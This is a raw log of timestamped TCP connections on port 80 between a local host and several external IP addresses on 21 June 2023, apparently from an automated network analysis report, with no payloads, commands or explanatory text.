                                                                                                  Jun 21, 2023 20:24:09.067537069 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067559004 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.067586899 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067617893 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.067635059 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067643881 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.067682981 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067693949 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.067732096 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067738056 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.067780972 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067827940 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067836046 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.067877054 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067900896 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.067924976 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067925930 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.067974091 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.067991018 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068022966 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.068030119 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068070889 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.068074942 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068120956 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.068128109 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068214893 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.068216085 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068279982 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068290949 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.068353891 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068377972 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.068425894 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.068438053 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068479061 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.068485975 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.068535089 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.282289982 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:09.316173077 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316282034 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316370964 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316432953 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316442966 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316478968 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316489935 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316526890 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316538095 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316576004 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316582918 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316623926 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316641092 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316672087 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316678047 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316725016 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316749096 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316796064 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316803932 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316843033 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316844940 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316890001 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316891909 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316939116 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316941023 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.316987038 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.316987991 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317035913 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317042112 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317082882 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317089081 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317131996 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317133904 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317178965 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317181110 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317228079 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317233086 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317274094 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317276955 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317321062 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317329884 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317372084 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317378044 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317420006 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317420959 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317468882 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317472935 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317516088 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317517996 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317564011 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.317579985 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.317657948 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.318651915 CEST4971580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:24:09.473264933 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.473417044 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:09.563910961 CEST8049715211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:24:09.666716099 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:09.888717890 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.250876904 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:10.267966032 CEST8049713104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.268038034 CEST4971380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:10.362101078 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.378479958 CEST4971880192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:24:10.395451069 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.395558119 CEST4971880192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:24:10.395931959 CEST4971880192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:24:10.395968914 CEST4971880192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:24:10.412900925 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.412923098 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.527506113 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.527533054 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.527607918 CEST4971880192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:24:10.533988953 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.534085035 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.534383059 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.534444094 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.534898043 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.534956932 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.535341978 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.535413980 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.535815954 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.535881996 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.536377907 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.536398888 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.536676884 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.536772013 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.536791086 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.536812067 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.536873102 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.538431883 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.561626911 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.561734915 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.575100899 CEST4971880192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:24:10.575153112 CEST4971880192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:24:10.576529026 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.592125893 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.592149973 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.594891071 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.653748035 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.653775930 CEST8049718188.114.96.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.653848886 CEST4971880192.168.2.4188.114.96.7
                                                                                                  Jun 21, 2023 20:24:10.722147942 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.722271919 CEST4971680192.168.2.4181.63.252.68
                                                                                                  Jun 21, 2023 20:24:10.761153936 CEST8049716181.63.252.68192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.795892000 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796045065 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796116114 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796156883 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796164989 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796202898 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796214104 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796214104 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796257973 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796297073 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796330929 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796338081 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796386003 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796407938 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796449900 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796451092 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796495914 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796514034 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796551943 CEST8049717154.221.19.146192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.796559095 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.796595097 CEST4971780192.168.2.4154.221.19.146
                                                                                                  Jun 21, 2023 20:24:10.834383011 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.834964991 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.861423969 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.861579895 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.861983061 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.862085104 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.862375975 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.887638092 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.887701988 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.887751102 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.887815952 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.887861013 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.887995005 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.888044119 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.888091087 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.888102055 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.888138056 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.888149977 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.888186932 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.888232946 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.888245106 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.888302088 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.888370037 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.913695097 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.913781881 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.913844109 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.913861036 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.913892031 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.913940907 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.913975954 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.913986921 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914021015 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914052963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914087057 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914132118 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914151907 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.914179087 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914182901 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.914227009 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914273024 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914288044 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.914320946 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914367914 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914377928 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.914414883 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914474964 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914495945 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.914541006 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914598942 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914603949 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.914654970 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.914719105 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.941261053 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941339016 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941400051 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941426039 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.941457033 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941526890 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941538095 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.941585064 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941653013 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941656113 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.941720963 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941781998 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941792011 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.941845894 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941914082 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.941920042 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.941982031 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942035913 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942058086 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942081928 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942126989 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942143917 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942173958 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942219019 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942231894 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942266941 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942312002 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942332983 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942358017 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942404985 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942447901 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942492962 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942497969 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942540884 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942588091 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942632914 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942634106 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942632914 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942679882 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942713976 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942744970 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942778111 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942823887 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942826986 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942852020 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942874908 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942922115 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.942934990 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.942969084 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.943017006 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.943042994 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.943065882 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.943111897 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.943159103 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.943205118 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.943234921 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.943234921 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.943253040 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.943398952 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.968663931 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.968836069 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.968903065 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.968938112 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.968966961 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969036102 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969039917 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969105959 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969177008 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969244957 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969254017 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969305992 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969367981 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969408035 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969433069 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969456911 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969487906 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969537020 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969584942 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969609976 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969630957 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969676018 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969702959 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969727039 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969752073 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969774008 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969820976 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969840050 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969868898 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969913006 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.969933033 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.969959974 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970006943 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970020056 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970052958 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970098972 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970144033 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970176935 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970190048 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970205069 CEST4971980192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:10.970237017 CEST804971945.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:10.970283031 CEST804971945.9.74.80192.168.2.4
